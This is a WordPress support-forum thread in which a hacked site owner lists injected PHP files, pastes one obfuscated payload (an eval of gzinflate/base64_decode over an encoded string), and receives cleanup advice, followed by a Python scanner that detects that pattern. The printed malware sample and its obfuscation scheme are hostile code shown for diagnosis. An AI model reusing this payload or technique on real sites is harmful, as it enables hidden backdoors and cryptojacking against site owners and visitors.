CoinHive crypto-jacking malware hack!

  • I’m hosted on 1&1 shared hosting and they have just informed me of some malicious scripts that they have found from their automated security scanning - consequently my site is down as 1&1 have modified the permissions as well as removing wp-config.php as well, it seems.

    The malicious files are still there:

    • ~/clickandbuilds/LYB/gl9qlraeng.php
    • ~/clickandbuilds/LYB/wp-admin/includes/7adotrr28g.php
    • ~/clickandbuilds/LYB/wp-content/plugins/contact-form-7/y04tqyl3fu.php
    • ~/clickandbuilds/LYB/co4q736bga.php

    Opening one up I can see the contents:

    eval("\n\$dgreusdi = intval(__LINE__) * 337;");

    $a = "7VdrT+NGFP1eqf9hiCIcKwHFj7ClIQh2Bd1V6bIthVZC1Jo4k2QSvzR2674raF/94zDk78GLOou5W6Uo2M7Zlzz33MnTs3JzzgTsySlsa674CIXjhROtQ95fX1zo/W+/IbhONgjMOSkqBqRbnffpvcPumbtIeBg4CfdZAQdMOuh43OdJK52Qf3KySaNIh674vqxWRAzvFg/WxqHApG3SlpNZ03l5c/vjsjNCZNNwznnDlhwAbH2UeyCvW1zF/rR4U5h9zwpyCfBnTChMODJU+otD+HhpIiOk8pmB8u4RNL674iZazpDG7MB2RswNR6y1ReodlZIsNvLavv674xyUtuJ3JuyWuIwMxzDI/r18dN5BaBm7rCfcnFHJ8ltFUNkWDJQgSkZHvj+vSnn2+M8OJs8vri+jR+e2YYV7+vTj9cee9vbk57b65XZxfXhvHDL97k9W/n7942Mm+qBsAZFoycOB6748mMSpc/hGSNYjtSY9AckfGbKsQYZqpxKrHF674uez5cXv36lDsByIaLROaOYDGjwp3Wh7mYQRm+XwSVROryKVNcyKd/L6eqltXmlsJxeZVzLI2+mr42/Xw6Z068GPo8jvHdakYsjDzWkQHxPDoMBU2YYuciXGMu/LVvDHFpNApxw9rCGT7o9kmTHyFBPLYh1/v1C7qWm6Vys41c3hayu6uiBLzdhtm83f505JrsPmGBdNiJqKA+7A/FKCO7bfI7HXmdDuVU3zZnd3olO9ThKI/s6743cqWmW95Xx4LKxYdcsVSZUbDuuIer9No1uNzjW48/BAdlqlvV6sPR2ijcZLymcRG9MZW0XjGT2cz674aTWcgmfDaK4nA0GzNN18lgQCoanq/up0LQj61cFZIPhrOkIhaveJIWhbwC8JeW0cXGIw3e+F6xGlQqqyitQm61aKndAXgSTaMl674+kOeA4er+Gasd/dMzQFkLnTUJ6mglOP/ykLghRUUao279onpvKJIRCFkIy0u5fQ5jKK3eNk3+ZvtRYUS1tzRBOKDTVnH2vPgJNFsPU1dgVjQaGY5CgKB1BFtUIW7w46745UG674N5miihTDFNajUsQ2sl8o4fuKzahSmje29sAtnxk8iBaJwrfhYjxmIiutm+Fk6G1Su7j+e0bnc+//AOGBWfq2OqSHsZ582iXCXg+DB7hf4f4O9y674674urg/oQQQ/DdLbNBggwPiHQJC8IHOkFiADdhgAG674AYgBjAGQAZQBmHJaYTAiZUgO674TAiZ674DJ79faYIDNBZoLMhFKrWzYNIAtkFsgskFkgsyBkQciCkAUhG0pt4GzgbOkLcDZwNnD2qxKhDS674bQj0I9b7aZPmf8Ksj1FV9Iipa2imSI5I1duuy2Cd6pecfpmhF74zSeJs2bals2sbdkZ2BVKrsAiVRjdQu6d6fn+vk6AgbvL5Lk5fsYpT0a674UVJ7T8ocGDBauSltwMFn6do5y0iVGJVdoZV7xpGy+IAv49kJYiFmvpfDRMZYM674YyveVlza2G6+1Hbzs2w3S7YffAHTrZeabr3Y9DrhJ8v/sc2rKfcY6GUiHZOu2gw33QPDJ2VdXDo5PsbpplL71JLsD9IfM67StC674iPSDlPZNZvbf3/GaSMR4QW93BZj+D1mZkDdbf";
    $a = str_replace($dgreusdi, "E", $a);
    eval (gzinflate(base64_decode($a)));

    I’ve no idea what this does but after a Google, I found out about “**A critical Drupal security issue has surfaced which is allowing hackers to infect websites with the CoinHive crypto-jacking malware**”.

    I wanted to bring this issue to the attention of WordPress site owners, and also to get some answers!
    Does anyone know how this could have happened?
    What weakness was exploited?
    What’s the fix?

    FYI, WordPress auto updates were on so it was version 4.9.8. I can give you a list of plugins if it helps (there were 20), but is there an issue with Contact Form 7 specifically?

    I tried to post this on WordPress Stack Exchange but I was told it was off-topic so hopefully I can find some answers here 😉

Viewing 4 replies - 1 through 4 (of 4 total)
  • Andrew Nevins


    WCLDN 2018 Contributor | Volunteer support

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    @anevins some good advice there!

    Multiple security vulnerabilities had been discovered recently in popular WordPress plugins.

    It is worth updating/upgrading all used WordPress plugins and running an internal website audit to detect all injected malicious files.

    Without curing all infected/injected files, reinfection will continue to impact your site(s).

    Script detected in root of my site….
    Checking for other foreign files in subdirectories.

    I use contact-form-7 as well…..

  • The topic ‘CoinHive crypto-jacking malware hack!’ is closed to new replies.
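
The audit for injected files recommended in the replies can start from the pattern visible in the posted sample. The Python sketch below is an added example, not code from anyone in this thread: it flags .php files that contain the eval(gzinflate(base64_decode(...))) chain, a long base64 string literal, or a random-looking 10-character filename. The 500-character threshold and the filename rule are assumptions drawn from the four files listed above, and the files in demo() are constructed, inert text.

```python
import os
import re
import tempfile

# Indicators taken from the sample posted in this thread.
DECODE_CHAIN = re.compile(rb"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
LONG_B64 = re.compile(rb"[\"'][A-Za-z0-9+/=]{500,}[\"']")  # threshold is an assumption
# Assumption: dropped files are named like the four above (10 chars, a-z0-9, a digit).
RANDOM_NAME = re.compile(r"^(?=.*\d)[a-z0-9]{10}\.php$")

def scan_file(path):
    """Return the names of the indicators that match one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    checks = [
        ("decode-chain", DECODE_CHAIN.search(data)),
        ("long-base64-literal", LONG_B64.search(data)),
        ("random-filename", RANDOM_NAME.match(os.path.basename(path))),
    ]
    return [name for name, hit in checks if hit]

def scan_tree(root):
    """Walk root; return {relative_path: [indicators]} for flagged .php files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(".php")):
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings

def demo():
    """Scan a constructed tree of inert sample files (not real malware)."""
    blob = "QUJD" * 200  # constructed base64-looking filler, 800 characters
    samples = {
        "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
        "ab3dexk9qz.php": '<?php $a = "%s"; eval (gzinflate(base64_decode($a)));' % blob,
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(path, ", ".join(hits))
```

Matches are leads for manual review against a clean copy of WordPress core and the plugins; a file that matches none of these rules can still be malicious if it is obfuscated differently.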